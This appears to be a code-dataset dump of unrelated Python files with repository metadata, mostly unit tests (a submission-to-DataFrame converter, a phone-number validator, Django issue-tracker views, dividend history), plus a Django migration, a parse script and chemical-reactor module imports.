stefantaubert/imageclef-lifelog-2019
|
e779526583978be828ebc096538d094cc3cc260e
|
[
"MIT"
] | 1
|
2020-08-15T01:55:07.000Z
|
2020-08-15T01:55:07.000Z
|
submissions/converter.tests.py
|
stefantaubert/imageclef-lifelog-2019
|
e779526583978be828ebc096538d094cc3cc260e
|
[
"MIT"
] | null | null | null |
submissions/converter.tests.py
|
stefantaubert/imageclef-lifelog-2019
|
e779526583978be828ebc096538d094cc3cc260e
|
[
"MIT"
] | null | null | null |
import unittest
from submissions.runs.converter import subm_to_df
class UnitTests(unittest.TestCase):
def test_subm_to_df_has_headers(self):
csv = subm_to_df({ })
self.assertEqual("topic_id", csv.columns[0])
self.assertEqual("image_id", csv.columns[1])
self.assertEqual("confidence_score", csv.columns[2])
def test_subm_to_df_empty(self):
csv = subm_to_df({ })
self.assertEqual(0, len(csv.index))
def test_subm_to_df_normal(self):
to_conv = {
1: {
'u1_20180528_1816_i00': 1.0,
'u1_20180508_1106_i00': 0.6,
},
2: {
'u1_20180528_1819_i00': 1.0,
'u1_20180508_1106_i01': 0.8,
},
3: {
'u1_20180514_1117_i07': 0.46,
'u1_20180508_1119_i02': 0.31,
},
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[5]))
def test_subm_to_df_ignore_empty(self):
to_conv = {
1: {
'u1_20180528_1816_i00': 1.0,
'u1_20180508_1106_i00': 0.6,
},
2: {
'u1_20180528_1819_i00': 1.0,
'u1_20180508_1106_i01': 0.8,
},
3: {
'u1_20180514_1117_i07': 0.46,
'u1_20180508_1119_i02': 0.31,
},
4: { },
5: { }
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[5]))
def test_subm_to_df_unsorted_scores_are_kept(self):
to_conv = {
1: {
'u1_20180508_1106_i00': 0.6,
'u1_20180528_1816_i00': 1.0,
},
2: {
'u1_20180508_1106_i01': 0.8,
'u1_20180528_1819_i00': 1.0,
},
3: {
'u1_20180508_1119_i02': 0.31,
'u1_20180514_1117_i07': 0.46,
},
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[5]))
def test_subm_to_df_keys_are_sorted(self):
to_conv = {
1: {
'u1_20180508_1106_i00': 0.6,
'u1_20180528_1816_i00': 1.0,
},
3: {
'u1_20180508_1119_i02': 0.31,
'u1_20180514_1117_i07': 0.46,
},
2: {
'u1_20180508_1106_i01': 0.8,
'u1_20180528_1819_i00': 1.0,
},
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[5]))
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(UnitTests)
unittest.TextTestRunner(verbosity=2).run(suite)
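The assertions pin down subm_to_df's contract: fixed column order, topic keys emitted in sorted order, per-topic insertion order preserved, and empty topics skipped. The real implementation lives in submissions.runs.converter and is not shown; a hypothetical reconstruction consistent with these tests:

import pandas as pd

def subm_to_df(submission):
    # submission: {topic_id: {image_id: confidence_score}}
    rows = []
    for topic_id in sorted(submission):
        for image_id, score in submission[topic_id].items():
            rows.append((topic_id, image_id, score))
    return pd.DataFrame(rows, columns=["topic_id", "image_id", "confidence_score"])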
| 36.448819
| 78
| 0.550227
| 638
| 4,629
| 3.666144
| 0.111285
| 0.205216
| 0.112869
| 0.058145
| 0.845661
| 0.826422
| 0.826422
| 0.80077
| 0.80077
| 0.794357
| 0
| 0.278274
| 0.298985
| 4,629
| 127
| 79
| 36.448819
| 0.442527
| 0
| 0
| 0.685185
| 0
| 0
| 0.215983
| 0
| 0
| 0
| 0
| 0
| 0.296296
| 1
| 0.055556
| false
| 0
| 0.018519
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
64b4e1931412f2bd80b1d69ceed651e7593adb96
| 1,435
|
py
|
Python
|
tests/test_checkPhoneNumber.py
|
clara0/learn-python
|
ab6d6f3503314ae01442a777c453a383aafdd190
|
[
"Apache-2.0"
] | null | null | null |
tests/test_checkPhoneNumber.py
|
clara0/learn-python
|
ab6d6f3503314ae01442a777c453a383aafdd190
|
[
"Apache-2.0"
] | 6
|
2020-08-08T16:58:01.000Z
|
2020-09-03T02:01:45.000Z
|
tests/test_checkPhoneNumber.py
|
clara0/learn-python
|
ab6d6f3503314ae01442a777c453a383aafdd190
|
[
"Apache-2.0"
] | 1
|
2020-07-24T20:29:41.000Z
|
2020-07-24T20:29:41.000Z
|
from unittest import TestCase
import check_phone_number
class TestCheckPhoneNumber(TestCase):
def test_checkPhoneNum(self):
self.assertTrue(check_phone_number.checkPhoneNum('555-555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('(555)555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('(555) 555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('555 555 5555'))
self.assertTrue(check_phone_number.checkPhoneNum('5555555555'))
self.assertTrue(check_phone_number.checkPhoneNum('1 555-555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1(555) 555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1(555)555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1(555) 555 5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1 552 235 5490'))
self.assertFalse(check_phone_number.checkPhoneNum('2(555) 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('1jjj 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('1 234234 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('2( 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('2555) 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('(1 (555 555 5555)'))
self.assertFalse(check_phone_number.checkPhoneNum('(1 (555 dddddd55 5555)'))
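check_phone_number itself is imported but not shown. One regex that would satisfy every assertion above (optional leading "1", optional parentheses around the area code, space or dash separators) is sketched below; it is an illustration, not necessarily the repository's implementation.

import re

_PHONE_RE = re.compile(r"(1 ?)?(\(\d{3}\)|\d{3})[ -]?\d{3}[ -]?\d{4}")

def checkPhoneNum(number):
    # fullmatch rejects stray characters before or after the number
    return _PHONE_RE.fullmatch(number) is not None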
| 59.791667
| 86
| 0.743554
| 175
| 1,435
| 5.885714
| 0.154286
| 0.174757
| 0.279612
| 0.478641
| 0.853398
| 0.853398
| 0.853398
| 0.853398
| 0.709709
| 0.606796
| 0
| 0.143897
| 0.137979
| 1,435
| 23
| 87
| 62.391304
| 0.688763
| 0
| 0
| 0.285714
| 0
| 0
| 0.170035
| 0
| 0
| 0
| 0
| 0
| 0.809524
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b3a083e3392093ee4cb9507a16956496b07863c2
| 2,408
|
py
|
Python
|
pipedrive/migrations/0002_auto_20170423_2217.py
|
MasAval/django_pipedrive
|
b5b4df63f2585231dbd710779e242fe3a4e12dc7
|
[
"BSD-3-Clause"
] | 5
|
2017-04-28T19:00:35.000Z
|
2021-02-23T19:49:14.000Z
|
pipedrive/migrations/0002_auto_20170423_2217.py
|
sulsseo/django_pipedrive
|
3c55ba99dd23bdc7638caf8bc94c17a6b675de43
|
[
"BSD-3-Clause"
] | 21
|
2017-05-01T04:11:55.000Z
|
2021-06-10T18:10:10.000Z
|
pipedrive/migrations/0002_auto_20170423_2217.py
|
MasAval/django_pipedrive
|
b5b4df63f2585231dbd710779e242fe3a4e12dc7
|
[
"BSD-3-Clause"
] | 5
|
2017-09-04T02:35:56.000Z
|
2021-05-06T09:09:46.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.contrib.postgres.fields.hstore
class Migration(migrations.Migration):
dependencies = [
('pipedrive', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='activity',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='deal',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='dealfield',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='note',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='organization',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='organizationfield',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='person',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='personfield',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='pipeline',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='stage',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='user',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
]
| 33.915493
| 79
| 0.601744
| 216
| 2,408
| 6.578704
| 0.194444
| 0.109782
| 0.17734
| 0.228008
| 0.809289
| 0.786066
| 0.786066
| 0.786066
| 0.786066
| 0.786066
| 0
| 0.0029
| 0.284053
| 2,408
| 70
| 80
| 34.4
| 0.821346
| 0.008721
| 0
| 0.6875
| 0
| 0
| 0.124109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046875
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
376735ec3a2d74376c631c89b10cfeb4e2849e37
| 108
|
py
|
Python
|
scripts/parse.py
|
Jingil-Integrated-Management/JIM_backend
|
f0e7860d57eddaee034531a52ab91d6715d12c18
|
[
"Apache-2.0"
] | null | null | null |
scripts/parse.py
|
Jingil-Integrated-Management/JIM_backend
|
f0e7860d57eddaee034531a52ab91d6715d12c18
|
[
"Apache-2.0"
] | null | null | null |
scripts/parse.py
|
Jingil-Integrated-Management/JIM_backend
|
f0e7860d57eddaee034531a52ab91d6715d12c18
|
[
"Apache-2.0"
] | null | null | null |
from utils.client_parser import parse as client
from utils.data_parser import parse as data
client()
data()
| 21.6
| 47
| 0.814815
| 18
| 108
| 4.777778
| 0.444444
| 0.209302
| 0.395349
| 0.44186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 108
| 4
| 48
| 27
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3776553cfe17fcfd236d7dc2b17cf27d34cf964a
| 7,607
|
py
|
Python
|
issues/test_views.py
|
alexander4k/unicorn-attractor-issue-tracker
|
29b21046c528df40018c275d52f190d40d30d327
|
[
"OML"
] | 1
|
2021-02-07T00:20:59.000Z
|
2021-02-07T00:20:59.000Z
|
issues/test_views.py
|
alexander4k/unicorn-attractor-issue-tracker
|
29b21046c528df40018c275d52f190d40d30d327
|
[
"OML"
] | null | null | null |
issues/test_views.py
|
alexander4k/unicorn-attractor-issue-tracker
|
29b21046c528df40018c275d52f190d40d30d327
|
[
"OML"
] | 2
|
2019-04-25T20:45:12.000Z
|
2021-02-07T01:44:08.000Z
|
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from profiles.models import Profile
from .models import Issue, Comment, Upvote
class TestIssuesViews(TestCase):
def setUp(self):
User.objects.create_user(username="test_user", password="test_password")
def test_get_all_issues_page(self):
response = self.client.get(reverse("all_issues"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "all_issues.html")
def test_get_bugs_page(self):
response = self.client.get(reverse("bugs"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "bugs.html")
def test_get_features_page(self):
response = self.client.get(reverse("features"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "features.html")
def test_get_create_issue_page_when_no_profile(self):
user = User.objects.get(username="test_user")
Profile.objects.filter(user=user).delete()
self.client.login(username='test_user', password='test_password')
response = self.client.get(reverse("create_issue"))
self.assertEqual(response.status_code, 403)
self.assertTemplateUsed(response, "403.html")
def test_get_create_issue_page_if_logged_in(self):
self.client.login(username='test_user', password='test_password')
response = self.client.get(reverse("create_issue"))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "create_issue.html")
def test_if_create_issue_page_refreshes_when_form_invalid(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
post_data = {
"title": "test",
"author": user,
"description": "description",
"issue": "BG"
}
response = self.client.post(reverse("create_issue"), post_data, follow=True)
self.assertRedirects(response, reverse("create_issue"), status_code=302)
self.assertTemplateUsed(response, "create_issue.html")
def test_if_create_issue_redirects_to_issue_details_when_form_valid(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
post_data = {
"title": "test",
"author": user,
"description": "description",
"issue_type": "BG"
}
response = self.client.post(reverse("create_issue"), post_data, follow=True)
issue = Issue.objects.get(title="test")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
self.assertTemplateUsed(response, "issue_details.html")
def test_if_delete_issues_redirects_to_404_if_no_issue(self):
self.client.login(username='test_user', password='test_password')
response = self.client.get("/issues/delete_issue2/")
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, "404.html")
def test_if_delete_issue_deletes_given_issue_and_redirects_to_all_issues(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
response = self.client.get("/issues/delete_issue1/")
self.assertRedirects(response, reverse("all_issues"), status_code=302)
def test_if_issue_details_page_displays_404_page_when_form_invalid(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
issue = Issue.objects.get(title="test")
post_data = {
"author": user,
"related": issue,
"co": "test"
}
response = self.client.post("/issues/issue_details1/", post_data, follow=True)
self.assertEqual(response.status_code, 500)
self.assertTemplateUsed(response, "500.html")
def test_if_issue_details_creates_a_comment_when_form_valid_and_refreshes(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
issue = Issue.objects.get(title="test")
post_data = {
"author": user,
"related_issue": issue,
"content": "test"
}
response = self.client.post("/issues/issue_details1/", post_data, follow=True)
comment = Comment.objects.get(author=user)
self.assertEqual("test", comment.content)
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
self.assertTemplateUsed(response, "issue_details.html")
def test_if_upvote_issue_redirects_to_403_if_no_profile(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Profile.objects.filter(user=user).delete()
response = self.client.get("/issues/add_upvote1/")
self.assertEqual(response.status_code, 403)
self.assertTemplateUsed(response, "403.html")
def test_if_add_upvote_redirects_to_404_if_no_issue(self):
self.client.login(username='test_user', password='test_password')
response = self.client.get("/issues/delete_issue2/")
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, "404.html")
def test_get_can_add_upvote_and_redirect_to_issue_details(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="BG", description="test")
issue = Issue.objects.get(title="test")
response = self.client.get("/issues/add_upvote1/")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
def test_get_can_add_upvote_even_if_already_upvoted_feature(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
user.profile.upvotes_owned += 10
user.profile.save()
Issue.objects.create(title="test", author=user, issue_type="FR", description="test")
issue = Issue.objects.get(title="test")
Upvote.objects.create(author=user, related_issue=issue)
response = self.client.get("/issues/add_upvote1/")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
def test_if_add_upvote_redirects_to_issue_details_if_issue_type_not_fr_or_br(self):
self.client.login(username='test_user', password='test_password')
user = User.objects.get(username="test_user")
Issue.objects.create(title="test", author=user, issue_type="none", description="test")
response = self.client.get("/issues/add_upvote1/")
self.assertRedirects(response, "/issues/issue_details1/", status_code=302)
| 47.248447
| 94
| 0.671092
| 899
| 7,607
| 5.420467
| 0.107898
| 0.059512
| 0.078802
| 0.068951
| 0.815309
| 0.791504
| 0.763595
| 0.717217
| 0.700595
| 0.649908
| 0
| 0.015074
| 0.206389
| 7,607
| 161
| 95
| 47.248447
| 0.792115
| 0
| 0
| 0.603053
| 0
| 0
| 0.154048
| 0.029837
| 0
| 0
| 0
| 0
| 0.221374
| 1
| 0.129771
| false
| 0.10687
| 0.038168
| 0
| 0.175573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
377a11fded6feec435c82c9919cb406689b21e6a | 187 | py | Python | Release/Tests/AnalysisTest/Python.VS.TestData/Outlining/Program.py | rsumner33/PTVS | f5d67cff8c7bb32992dd4f77c0dfddaca6071250 | ["Apache-2.0"] | null | null | null | Release/Tests/AnalysisTest/Python.VS.TestData/Outlining/Program.py | rsumner33/PTVS | f5d67cff8c7bb32992dd4f77c0dfddaca6071250 | ["Apache-2.0"] | null | null | null | Release/Tests/AnalysisTest/Python.VS.TestData/Outlining/Program.py | rsumner33/PTVS | f5d67cff8c7bb32992dd4f77c0dfddaca6071250 | ["Apache-2.0"] | 1 | 2020-12-09T10:16:23.000Z | 2020-12-09T10:16:23.000Z |
def f():
pass
#comment
class C:
pass
#comment
if True:
pass
#comment
if True:
pass
else:
pass
#comment
if True:
pass
elif True:
pass
#comment
377f00e755d17d424276dc3d5be23f3d422ce435 | 8,725 | py | Python | tests/test_dividend_history.py | ilyakatz/dividend_chaser | 55fee456e04b500068b05d0b6d386464b265778b | ["MIT"] | 1 | 2019-12-11T23:06:22.000Z | 2019-12-11T23:06:22.000Z | tests/test_dividend_history.py | ilyakatz/dividend_chaser | 55fee456e04b500068b05d0b6d386464b265778b | ["MIT"] | 28 | 2019-12-12T18:11:29.000Z | 2020-02-27T18:18:32.000Z | tests/test_dividend_history.py | ilyakatz/dividend_chaser | 55fee456e04b500068b05d0b6d386464b265778b | ["MIT"] | null | null | null |
import unittest
import datetime
from unittest.mock import patch
from freezegun import freeze_time
from dividend_chaser.workers.dividend_history import DividendHistory
from dividend_chaser.orm import orm
class TestNextDividend(unittest.TestCase):
def setUp(self):
print("Cleaning up database")
orm.Dividend.where("1", "=", "1").delete()
orm.Dividendable.where("1", "=", "1").delete()
@freeze_time("2020-03-12 12:00:01")
def test_next_dividend(self):
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": "2020-03-31",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
next_date = DividendHistory.next_dividend("STWD")
self.assertEqual(next_date, datetime.date(2020, 3, 31))
@freeze_time("2020-03-12 12:00:01")
def test_next_dividend_recent(self):
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48},
{"date": datetime.date(2020, 3, 12).strftime("%s"), "formatted_date": "2019-03-12", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": "2020-03-31",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
next_date = DividendHistory.next_dividend("STWD")
self.assertEqual(next_date, datetime.date(2020, 3, 12))
@freeze_time("2020-03-12 12:00:01")
def test_next_dividend_recent_for_dividendable(self):
"""
Make sure that we only look at dividends for the correct stock
"""
stwd_div_date = datetime.date(2020, 3, 31)
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48},
{"date": datetime.date(2020, 3, 1).strftime("%s"), "formatted_date": "2019-03-1", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": stwd_div_date,
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
},
"APPL": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48},
{"date": datetime.date(2020, 3, 12).strftime("%s"), "formatted_date": "2019-03-12", "amount": 0.48}
],
"next_dividend": {
"date": 1585640828,
"formatted_date": "2020-03-31",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
next_date = DividendHistory.next_dividend("STWD")
self.assertEqual(next_date, stwd_div_date)
class TestUpcoming(unittest.TestCase):
def setUp(self):
print("Cleaning up database")
orm.Dividend.where("1", "=", "1").delete()
orm.Dividendable.where("1", "=", "1").delete()
@freeze_time("2020-01-12 12:00:01")
def test_limit_by_volatility(self):
""" Return only results that have actual dividends
"""
dh = DividendHistory([])
true = {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
false = true.copy()
false.update({"average_volume": 100000})
stocks = {
"TRUE": true,
"FALSE": false
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "TRUE")
@freeze_time("2020-01-12 12:00:01")
def test_limit_upcoming_with_actual(self):
""" Return only results that have actual dividends
"""
dh = DividendHistory([])
stocks = {
"TRUE": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
},
"FALSE": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": False
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "TRUE")
@freeze_time("2020-01-12 12:00:01")
def test_limit_upcoming(self):
dh = DividendHistory([])
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "STWD")
@freeze_time("2020-01-16 12:00:01")
def test_limit_upcoming_unmet(self):
dh = DividendHistory([])
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-16 23:47:08.571429",
"formatted_date": "2020-01-16",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming()
self.assertEqual(len(res), 0)
@freeze_time("2020-01-12 12:00:01")
def test_limit_upcoming_custom_day_limit(self):
dh = DividendHistory([])
stocks = {
"STWD": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-17 23:47:08.571429",
"formatted_date": "2020-01-17",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
},
"PP": {
"dividends": [
{"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
],
"next_dividend": {
"date": "2020-01-15 23:47:08.571429",
"formatted_date": "2020-01-15",
"actual": True
},
"volatililty": 0.13605430659514575,
"dividend_yield": 0.0773,
"average_volume": 100001
}
}
for stock in stocks:
DividendHistory([])._persist_dividend_data(stock, stocks)
res = dh.upcoming(limit_days=6)
self.assertEqual(len(res), 1)
self.assertEqual(res[0].symbol, "STWD")
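# -----------------------------------------------------------------------------
# Editorial, illustrative sketch -- not part of the original test module. It
# only restates the call pattern exercised by the tests above: fixture data is
# persisted per symbol, then queried through next_dividend() / upcoming().
# The helper name `_example_usage_sketch` and the fixture variable name are
# assumptions for illustration.
def _example_usage_sketch():
    example_stocks = {
        "STWD": {
            "dividends": [
                {"date": 1577716200, "formatted_date": "2019-12-30", "amount": 0.48}
            ],
            "next_dividend": {"date": 1585640828, "formatted_date": "2020-03-31", "actual": True},
            "volatililty": 0.13605430659514575,  # key spelled as in the fixtures above
            "dividend_yield": 0.0773,
            "average_volume": 100001
        }
    }
    for symbol in example_stocks:
        DividendHistory([])._persist_dividend_data(symbol, example_stocks)
    next_date = DividendHistory.next_dividend("STWD")            # next payout date
    upcoming_soon = DividendHistory([]).upcoming(limit_days=6)   # filtered upcoming list
    return next_date, upcoming_soon
# -----------------------------------------------------------------------------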
37ab05efec782fa29b729b46c2e14ce59a3e64a4 | 322,167 | py | Python | PyREMOT/docs/pbReactor.py | sinagilassi/rmt-app | bbd5bb496f36116ecec15d75b4133a43a9233aaa | ["MIT"] | null | null | null | PyREMOT/docs/pbReactor.py | sinagilassi/rmt-app | bbd5bb496f36116ecec15d75b4133a43a9233aaa | ["MIT"] | null | null | null | PyREMOT/docs/pbReactor.py | sinagilassi/rmt-app | bbd5bb496f36116ecec15d75b4133a43a9233aaa | ["MIT"] | null | null | null |
# PACKED-BED REACTOR MODEL
# -------------------------
# import packages/modules
import math as MATH
import numpy as np
from numpy.lib import math
from scipy.integrate import solve_ivp
from timeit import default_timer as timer
from scipy.optimize import fsolve
from scipy import optimize
# internal
from PyREMOT.docs.modelSetting import MODEL_SETTING, PROCESS_SETTING
from PyREMOT.docs.rmtUtility import rmtUtilityClass as rmtUtil
from PyREMOT.docs.rmtThermo import *
from PyREMOT.docs.fluidFilm import *
